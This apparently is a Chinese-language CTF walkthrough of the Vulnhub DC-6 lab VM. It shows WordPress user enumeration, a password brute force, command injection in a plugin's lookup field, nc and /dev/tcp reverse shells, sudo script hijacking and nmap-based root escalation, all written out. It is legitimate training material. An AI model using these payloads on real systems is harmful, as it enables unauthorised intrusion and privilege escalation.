Vulnhub DC_6

前言

vulnhub dc6

https://www.vulnhub.com/entry/dc-6,315/

靶机IP

1
192.168.1.12

写入hosts

1
192.168.1.12 wordy

信息收集

1
nmap -p- --min-rate 10000 192.168.1.12 -oN nmap/port.txt 
1
2
3
PORT   STATE SERVICE
22/tcp open ssh
80/tcp open http
1
nmap -sT -sC -sV -O -p22,80 192.168.1.12 -oN nmap/detail.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
| 256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_ 256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-title: Wordy – Just another WordPress site
|_http-generator: WordPress 5.1.1
|_http-server-header: Apache/2.4.25 (Debian)
MAC Address: 08:00:27:AA:DF:23 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • 操作系统:Linux 3.2 - 4.14(Debian)
  • Web服务器:Apache 2.4.25 (Debian)
  • CMS系统:WordPress 5.1.1
1
dirsearch -u http://192.168.1.12 -e php,html,txt,js,bak -t 50 -w /usr/share/wordlists/dirb/common.txt 
1
gobuster dir -u http://192.168.1.12/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.js,.html -t 50
1
2
3
4
5
6
7
8
9
10
11
/index.php
/wp-admin
/wp-content
/wp-includes
/xmlrpc.php
/wp-login.php
/license.txt
/readme.html
/wp-trackback.php
/wp-signup.php
/server-status

wpscan

已知cms为WordPress 5.1.1,使用wpscan进行枚举

用户

1
wpscan --url http://wordy --enumerate u 
1
2
3
4
5
admin
sarah
graham
mark
jens

爆破

1
wpscan --url http://wordy/ -U users.txt -P /usr/share/wordlists/rockyou.txt

得到凭据

1
mark:helpdesk01

后台RCE

使用凭据登录

1
http://wordy/wp-login.php?registration=disabled

Activity monitor -> toos -> lookup存在命令执行

image-20260222204900784

1
2
3
4
5
6
------WebKitFormBoundaryBvV7QrEP9iMYIXcG
Content-Disposition: form-data; name="ip"

127.0.0.1 || whoami
------WebKitFormBoundaryBvV7QrEP9iMYIXcG
Content-Disposition: form-data; name="lookup"

image-20260222205328831

反弹shell

1
127.0.0.1 || nc -c /bin/bash 192.168.1.17 6666

image-20260222210224783

/home/mark/stuff/things-to-do.txt 找到信息

1
2
3
4
5
6
7
Things to do:

- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement

得到另一组凭据

1
graham:GSo7isUM1D4

ssh登录

image-20260222210641887

backups.sh横向

/home/jens发现备份脚本backups.sh,且graham用户sudo权限为

1
(jens) NOPASSWD: /home/jens/backups.sh

用户 graham 可以在不输入密码的情况下,以用户 jens 的身份执行 /home/jens/backups.sh 这个脚本

1
2
echo '#!/bin/bash' > backups.sh
echo 'bash -i >& /dev/tcp/192.168.1.17/7777 0>&1' >> backups.sh
1
sudo -u jens /home/jens/backups.sh

拿到jens权限

image-20260222211919353

nmap提权

sudo -l发现有/usr/bin/nmap 权限

提权

1
2
echo 'os.execute("/bin/bash")' > /tmp/shell.nse
sudo nmap --script=/tmp/shell.nse

image-20260222212747618

1
2
3
4
5
6
7
8
9
10
11
12
13
Yb        dP 888888 88     88         8888b.   dP"Yb  88b 88 888888 d8b 
Yb db dP 88__ 88 88 8I Yb dP Yb 88Yb88 88__ Y8P
YbdPYbdP 88"" 88 .o 88 .o 8I dY Yb dP 88 Y88 88"" `"'
YP YP 888888 88ood8 88ood8 8888Y" YbodP 88 Y8 888888 (8)


Congratulations!!!

Hope you enjoyed DC-6. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.

Vulnhub DC_6
http://xiaowu5.cn/2026/02/22/Vulnhub-DC-6/
作者
5
发布于
2026年2月22日
许可协议
BY XIAOWU